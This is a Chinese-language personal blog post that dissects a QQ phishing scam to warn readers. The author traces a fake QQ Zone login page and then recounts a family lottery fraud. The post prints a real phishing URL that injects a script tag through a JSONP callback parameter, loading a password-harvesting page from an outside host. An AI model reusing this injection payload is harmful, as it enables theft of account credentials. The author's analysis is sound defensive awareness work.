不要再被骗了------QQ盗号原理大揭秘

前言

相信大家在懵懂无知的时候都有被盗号的经历吧，QQ胡乱的加好友，突然有个好友传了个文件给你，打开以后发现QQ竟然显示强制下线，然后再也上不去了QAQ，很明显，QQ号被人盗了。最近也是很多小伙伴私信我，也看了一些人发空间说QQ号被盗了啥的，以及我自己收到的一些诈骗请求。网上针对防骗这块的文章几乎没有，为了不让更多的人受害，下面我将会以最真实朴素的语言介绍最常见的一种盗号诈骗方式，浅析一下这个盗号原理的全过程~~~希望大家不要再上当受骗啦~！

正文

下面我给大家介绍一种最常见的QQ诈骗方式。

这个是我今早收到的一条链接，相信不少朋友肯定也收到类似的链接吧，甚至乎很多人都说因为点开这个链接被盗号吧。。。只有不懂安全，没用安全意识的人才会这么说吧！！！

让我带大家来剖析一下这个东东吧~~~

很明显，你看这个域名看不出任何眉头，既然大家都不敢点，我就替大家点点看~~~

首先我们在手机端点开这个链接

点开一看，我们可以看到，是一个QQ空间登录界面，这个界面就是一个欺骗用户的界面，为什么这么说呢，你把这个界面链接复制出来，用浏览器打开，你会发现网页无法打开，并且域名成了下面这个：

http://sdk.h5.gamedog.cn/apih5v2/getIsLogin/?callback=%00%00%00%00%00%00%00%3CscripT/src%3D//p10t.cn/app.php%3Faid%3D5%3E%3C/scripT%3E%3C!--&bqvoqvwqtujhigzkumjk.png

看样子域名被浏览器解析成了一张png图片，你可能会有点好奇这个，我们用pc端按照这个地址进行追踪，用F12查看网页源代码

<scripT/src=//p10t.cn/app.php?aid=5></scripT><!--({"code":-2,"msg":"\u7528\u6237\u672a\u767b\u5f55"})

就只有这么一行，我们可以看到从登录页面输入完账号密码以后会跳转到一个app.php网页里面，我们循规蹈矩，直接去追踪访问那个界面

有点意思，网页从QQ空间进行跳转的

window.location.href = "http://qzone.qq.com";

学过JavaScript的朋友应该知道，location.href="网站链接"，表示重新定向到新页面，同时刷新打开的这个页面；

这个意思是从一个伪QQ空间的页面上输入账户密码，这个页面被植入了php的恶意木马，通过跳转重定向，直接跳转到了木马网站去了，后台数据库并记录了这条信息，然后你的QQ号账户密码就被别人成功获取了~~~

如果不信的话，我们可以一起来试一试

首先输入账号密码。。。我们就随便伪造一个，账号是3838438，密码就写一个mmpsbsbsb试试看！！！

这里还要说一点，我试的时候这里好像做的还挺真实的，防中文输入，我本来想直接开口大骂呢，hhhh，没给我这个机会。。。

这里无论输入什么账号密码都可以过，除了中文无法检测，账号必须是一连串的数字，密码防了中文输入。

然后我点击登录

看吧，直接就登录成功了，还有这张图片，这这这。。。完全就是挑衅啊，竟然贴一张小狗的图片，是在考验我智商嘛？

我尝试了一下ping它的主页，ping p10t.cn

ping通了，说明这个网站还活着。

但是登录页面显示403错误，服务器拒绝访问，我不是很清楚如何绕过这一防线。

那我也没辙了，技术不够精湛，我只能写下这篇文章记录一下，希望更多的人看到，不要再上当受骗了就好~~~

如果文章哪里写的有出路的地方，希望各位不吝赐教，如果有更好的解决方案，欢迎在评论区留言或私信给我，感谢大家的支持~~~

关于其他类型的诈骗

可能有些人遇到一些其他的诈骗，比如电话诈骗，短信诈骗，讲一个最真实的例子，推荐你们看一部电影，叫嘉年华，里面讲述的是关于电信诈骗的案件，这部电影是由真实事件改编而成的，非常推荐大家观看，里面有一些防诈骗的技巧，看完以后你会对常见的诈骗手段有了一个更深层次的了解。

如果没有找到资源的小伙伴，我也会在文章中分享给你们一个百度云链接，保存以后下载观看即可：链接：https://pan.baidu.com/s/1CrYJ9jtkSqqxzZSlzQTsqA 密码：2qlz

说这么多，可能大家会认为我在吹牛皮，认为这些事情不会发生在自己身上。我讲一个最真实的例子，我母亲因为前段时间地上见到一张彩票，刮开奖说中了10w块钱，我身在一个并不宽裕的家庭，按照现在的话来讲，算是贫农家庭，还远没达到小康水平，想想看，10w块钱从天而降，对于我们这种家庭，这绝对算是一笔相当的财富，当时我妈拿着彩票回家，和我还有我爸商量来着，我一看说，这肯定是骗局吧，这么好的事情为什么偏偏出现在我们身上，天上不会掉馅饼，努力奋斗才能梦想成真，我妈偏不信这个邪，想去试一试，然后拨打了上面的电话，上面巴拉巴拉说了一大堆，意思就是要交3000块钱税钱啥的，然后才能兑换这个钱，你看，这不明显是骗局嘛，我妈又觉得，如果得到了这个钱，相当于她少上多少年的班，其实说白了这一切都是为了这个不争气的我，我其实也是很愧疚的。所以朋友们要记住，只要谈到钱这个问题，要悠着点，十有八九都是骗局，我妈最后是按照地址打钱过去了，然后事实上，对方并没有想要兑换的意思，巴拉巴拉说了一大堆，好像又是要交钱。。。我妈现在才意识到被骗了，然后跑到警局报了案，警方说，你不是第一个了，关于彩票中奖被骗的人一大堆，他们说没有足够的证据线索，立不了案，没办法了，3k被狗吃了，这可是辛辛苦苦东奔西跑的血汗钱，这些骗子也是一点良心都没有，所以。。。后来我励志要当一名网警，要把这些逍遥法外的人绳之以法，天网恢恢疏而不漏，这些人最终一定逃不了法律的制裁的。

后记

关于盗号这一问题，我给大家提醒两句，只要少一点好奇心，少一点贪欲，多一点警惕之心，不管是什么类型的诈骗都不会出现在你身上，谨记哦。。。